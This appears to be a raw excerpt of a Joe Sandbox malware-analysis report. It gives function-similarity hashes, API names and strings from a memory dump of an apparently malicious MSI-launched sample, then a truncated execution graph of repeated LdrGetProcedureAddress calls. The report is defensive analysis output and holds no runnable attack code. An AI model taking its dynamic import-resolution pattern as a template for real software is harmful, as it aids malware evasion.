                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                      • Opcode ID: 7795d0b36ea3bc85fb8ec6e232a63016952886e55b16e0924611454eaac0fddf
                                                                                                                                                                                                                                                                      • Instruction ID: 65e384c583febae4d9d6aa0f9406b4a91cf839c7832214ff3997ebddd93cd471
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7795d0b36ea3bc85fb8ec6e232a63016952886e55b16e0924611454eaac0fddf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25514B71E09185DACB117B17CD0137A7794BF80B20F304D69E0D5821A9FE3A9C95FA87
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                      • API String ID: 3732870572-1956417402
                                                                                                                                                                                                                                                                      • Opcode ID: 00a7dd60d03f484bed8719fb5ebf5c8ef9e6558851eadae42cfac1c781bba588
                                                                                                                                                                                                                                                                      • Instruction ID: 50de929baa59c5b296c45e08503077ec152872c57ffd6a0c8b6364c6a00af754
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00a7dd60d03f484bed8719fb5ebf5c8ef9e6558851eadae42cfac1c781bba588
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F510031F04289AADB258FA888857BEBBB7BF45360F1C405BE891D7341C3749941FB61
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00FBBF6E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                                      • Opcode ID: 46375ccb1b61ed047cd758d2ade78d2ce57ae915d9c59f6667b436a51dce39e3
                                                                                                                                                                                                                                                                      • Instruction ID: 98082287415a752c1340a93efc4984f76223ae0457113cc2c50daae19824fca7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46375ccb1b61ed047cd758d2ade78d2ce57ae915d9c59f6667b436a51dce39e3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4251C4B1D003489FDB10DFA5CD41BEEB7B8FF05314F14426AE845AB281E775AA45CB91
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                                      • API String ID: 0-3019864461
                                                                                                                                                                                                                                                                      • Opcode ID: 10712abadaa69c700cb701246c7cb9cb3432398418e386a52e8442b6db00733c
                                                                                                                                                                                                                                                                      • Instruction ID: ca1426a865996e7976aa610501c77421f39ae96b7637ec433900a6c79a2fcee3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10712abadaa69c700cb701246c7cb9cb3432398418e386a52e8442b6db00733c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B519E70A143049BDB14EF6ACC45BEEB7B5FF85314F14451DE441AB280DBB5A984DFA0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD501
                                                                                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00FCD573
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2FC8: __EH_prolog3.LIBCMT ref: 00FC2FCF
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                                                                                                                      • String ID: %.0Lf
                                                                                                                                                                                                                                                                      • API String ID: 3050236999-1402515088
                                                                                                                                                                                                                                                                      • Opcode ID: c2415ecc9936e47c45117dadda14a4fdde77c26dcc871df60b7678fa003146de
                                                                                                                                                                                                                                                                      • Instruction ID: a769011b6281a800aa73935652163a68964ad84e187be105b25203a091bc6a62
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2415ecc9936e47c45117dadda14a4fdde77c26dcc871df60b7678fa003146de
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C419B71E002099BCF05EFD0CD46AED7BB5FF08304F148459E845AB295DB759915EF90
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD7A5
                                                                                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00FCD817
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                                      • String ID: %.0Lf
                                                                                                                                                                                                                                                                      • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                                      • Opcode ID: 905dbe3f8cdaf2104c177b14071faaa924622f83fa66fdac0800b3dd163ec225
                                                                                                                                                                                                                                                                      • Instruction ID: ed9376ca0b4ced660a803088a9d77593ebf02646600b717f0818272cdec6a96d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 905dbe3f8cdaf2104c177b14071faaa924622f83fa66fdac0800b3dd163ec225
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418B72E00209ABCF05EFD0DD45AEE7BB5FF08300F204459E945AB295EB78A915EF90
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FD188E
                                                                                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00FD1900
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                                      • String ID: %.0Lf
                                                                                                                                                                                                                                                                      • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                                      • Opcode ID: 436c8a30ae4cff9332464e6c195014e21de890625b0d1a85dd83ab06b134582b
                                                                                                                                                                                                                                                                      • Instruction ID: 16c7031a2f625faa62c3f22f324b9de8bf45983e3766fe80dfc3db8b7e1f059a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 436c8a30ae4cff9332464e6c195014e21de890625b0d1a85dd83ab06b134582b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01413771E00208ABCF05EFD4DC54ADDBBB6FF08300F204549E946AB295DB799A15EF90
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FD607E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                      • Opcode ID: 57f54a3442cd3242001f3f2ee4e7f6f9c81fee77f05438dc34b542cd789a4224
                                                                                                                                                                                                                                                                      • Instruction ID: 64ff8d1ef35022db51953d5e478f2803d2583112b1ae183c4d2f90ad63e5e41f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57f54a3442cd3242001f3f2ee4e7f6f9c81fee77f05438dc34b542cd789a4224
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D416871D00209EFCF15DF98CC81AAEBBB6FF48714F19815AF908A7212D3359951EB51
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                                      • String ID: !%x
                                                                                                                                                                                                                                                                      • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                                      • Opcode ID: e4bbea54ab17ff03880be0a0fa051dc4993dde1a780516b856389e9546b7fe04
                                                                                                                                                                                                                                                                      • Instruction ID: e573b61ccb8cc6691b1c69ef6e5d34c93ab4ff8df4fe9694b7f729072bb0f576
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4bbea54ab17ff03880be0a0fa051dc4993dde1a780516b856389e9546b7fe04
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50315871D0020AABDF04DF94E982BEEB7B6FF48304F10441DF905A7251DB79AA45DB64
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                                      • String ID: !%x
                                                                                                                                                                                                                                                                      • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                                      • Opcode ID: bdb4dd7d24e8bc61af56e8c3c13faf71acb162fbf7625e3d79ee0d6902e7834d
                                                                                                                                                                                                                                                                      • Instruction ID: c477bd5ffef94c2328c46b6af19e81cdd486afd471d6971d2f630f58464d67af
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdb4dd7d24e8bc61af56e8c3c13faf71acb162fbf7625e3d79ee0d6902e7834d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E313972D15259AFDF05DF94DC41AEEBBB6BF09300F18001AF844A7342D7799A45EBA0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00FB5F86
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,8F6E4A30), ref: 00FB5FF6
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConvertFreeLocalString
                                                                                                                                                                                                                                                                      • String ID: Invalid SID
                                                                                                                                                                                                                                                                      • API String ID: 3201929900-130637731
                                                                                                                                                                                                                                                                      • Opcode ID: 28ad464436760a8bc11446c3cdd1e48d6e0e208f9eb0a469b892122027de2a27
                                                                                                                                                                                                                                                                      • Instruction ID: fbabad70265b851a6634fcfeead4f9d153316793c0762a0f73d5f6c09e081526
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28ad464436760a8bc11446c3cdd1e48d6e0e208f9eb0a469b892122027de2a27
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76218C75A046099BDB14DF59C815BBFBBF8EF44B14F100A1EE401A7780D7BAAA04DBD0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB909B
                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FB90FE
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                                                                                                                      • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                                                      • Opcode ID: 86f3c98ce2bc6b88971024dec0c7dd17f26ff56fabdd04a2cd3d33009c0ac52a
                                                                                                                                                                                                                                                                      • Instruction ID: d79c78da974bdc56541078bc1cc1a5f1240e7c66447ba52d52bd3ee5fa70a79b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86f3c98ce2bc6b88971024dec0c7dd17f26ff56fabdd04a2cd3d33009c0ac52a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA210270809784DED321CFA8C904B8BBFF4EF19310F00868DE09997781D7B9A604CBA1
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 2427045233-2658103896
                                                                                                                                                                                                                                                                      • Opcode ID: 4f07fdb0f4cdb3fe7b309b0019efe0e4d72702c16d4dcda1328bac8cc5dd3527
                                                                                                                                                                                                                                                                      • Instruction ID: 1dc80477594feb3c871b7fd6f3a3acc2470af7730a2733c02e8fed2b1121e85b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f07fdb0f4cdb3fe7b309b0019efe0e4d72702c16d4dcda1328bac8cc5dd3527
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E11AC75940745AED721EFB5CC41BCAB7F4AB05300F14891AE5A2CB292EA34A508AB90
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00FB4261,00FF4400,000000FF,8F6E4A30,00000000,?,00000000,?,?,?,00FF4400,000000FF,?,00FB3A75,?), ref: 00FB4096
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,40000022,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4154
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4177
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FB4217
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Local$AllocFree
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2012307162-0
                                                                                                                                                                                                                                                                      • Opcode ID: b8a3cc632cdcd55fed907fa846dbd9a6fd8c0ea6ee86ab03814d90c0d44f50f1
                                                                                                                                                                                                                                                                      • Instruction ID: 324e46309f732c17b651a78611df481f6c3c70c3793b0817e33970e38f5d5180
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8a3cc632cdcd55fed907fa846dbd9a6fd8c0ea6ee86ab03814d90c0d44f50f1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2151BAB1E002069FCB18DF6DCA85AAEBBA5EB48350F14462DE925E7381D734A940DF90
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00FB1E01
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00FB1E21
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00FB1EA7
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000001,8F6E4A30,00000000,00000000,00FF3C40,000000FF,?,00000000), ref: 00FB1F2D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Local$AllocFree
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2012307162-0
                                                                                                                                                                                                                                                                      • Opcode ID: c382ec009d142da251d342395a073ebe0ffbf3b4f0c6430611a2b8f908a09686
                                                                                                                                                                                                                                                                      • Instruction ID: d41a3dc1d4ac27c489716052c2a03b0601426ec5e8f6f1914e1c3ca85ca0c724
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c382ec009d142da251d342395a073ebe0ffbf3b4f0c6430611a2b8f908a09686
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51E272A042159FC715EF29DC80AABB7E9FF48360F500A2EF856D7290DB70E904DB91

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:3.2%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.2%
                                                                                                                                                                                                                                                                      Signature Coverage:12.5%
                                                                                                                                                                                                                                                                      Total number of Nodes:1088
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:64
49784 1ff4cae1770 49783->49784 49785 1ff4cadcce0 LdrGetProcedureAddress 49784->49785 49786 1ff4cae1788 49785->49786 49787 1ff4cadcce0 LdrGetProcedureAddress 49786->49787 49788 1ff4cae17a0 49787->49788 49789 1ff4cadcce0 LdrGetProcedureAddress 49788->49789 49790 1ff4cae17b8 49789->49790 49791 1ff4cadcce0 LdrGetProcedureAddress 49790->49791 49792 1ff4cae17d0 49791->49792 49793 1ff4cadcce0 LdrGetProcedureAddress 49792->49793 49794 1ff4cae17e8 49793->49794 49795 1ff4cadcce0 LdrGetProcedureAddress 49794->49795 49796 1ff4cae1800 49795->49796 49797 1ff4cadcce0 LdrGetProcedureAddress 49796->49797 49798 1ff4cae1818 49797->49798 49799 1ff4cadcce0 LdrGetProcedureAddress 49798->49799 49800 1ff4cae1830 49799->49800 49801 1ff4cadcce0 LdrGetProcedureAddress 49800->49801 49802 1ff4cae1848 49801->49802 49803 1ff4cadcce0 LdrGetProcedureAddress 49802->49803 49804 1ff4cae1860 49803->49804 49805 1ff4cadcce0 LdrGetProcedureAddress 49804->49805 49806 1ff4cae1878 49805->49806 49807 1ff4cadcce0 LdrGetProcedureAddress 49806->49807 49808 1ff4cae1890 49807->49808 49809 1ff4cadcce0 LdrGetProcedureAddress 49808->49809 49810 1ff4cae18a8 49809->49810 49811 1ff4cadcce0 LdrGetProcedureAddress 49810->49811 49812 1ff4cae18c0 49811->49812 49813 1ff4cadcce0 LdrGetProcedureAddress 49812->49813 49814 1ff4cae18d8 49813->49814 49815 1ff4cadcce0 LdrGetProcedureAddress 49814->49815 49816 1ff4cae18f0 49815->49816 49817 1ff4cadcce0 LdrGetProcedureAddress 49816->49817 49818 1ff4cae1908 49817->49818 49819 1ff4cadcce0 LdrGetProcedureAddress 49818->49819 49820 1ff4cae1920 49819->49820 49821 1ff4cadcce0 LdrGetProcedureAddress 49820->49821 49822 1ff4cae1938 49821->49822 49823 1ff4cadcce0 LdrGetProcedureAddress 49822->49823 49824 1ff4cae1950 49823->49824 49825 1ff4cadcce0 LdrGetProcedureAddress 49824->49825 49826 1ff4cae1968 49825->49826 49827 1ff4cadcce0 LdrGetProcedureAddress 49826->49827 49828 1ff4cae1980 49827->49828 49829 1ff4cadcce0 LdrGetProcedureAddress 49828->49829 49830 1ff4cae1998 49829->49830 49831 
